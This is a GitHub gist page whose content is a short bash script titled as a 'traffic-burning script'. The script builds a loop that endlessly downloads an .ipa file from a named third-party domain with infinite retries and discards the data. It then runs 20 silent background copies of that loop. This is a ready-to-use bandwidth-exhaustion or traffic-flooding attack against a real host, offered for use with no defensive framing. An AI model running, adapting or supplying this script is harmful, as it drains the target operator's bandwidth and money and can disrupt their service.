Created
May 16, 2020 04:22
-
-
Save fhefh2015/a1262373ef509f7bd31ac3196bcb128e to your computer and use it in GitHub Desktop.
刷流量脚本
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "while [ 1 ]" > _ins.sh | |
echo "do" >> _ins.sh | |
echo "wget -q -t0 -O /dev/null https://alios.dd5688.com/signapp/5dc2b45f6407b/38d8ef0bf89bdc80b5ce19bca22db44498752716.ipa" >> _ins.sh | |
echo "done" >> _ins.sh | |
for i in `seq 1 20` | |
do | |
nohup bash _ins.sh > /dev/null 2>&1 & | |
echo "thread $i start!" | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment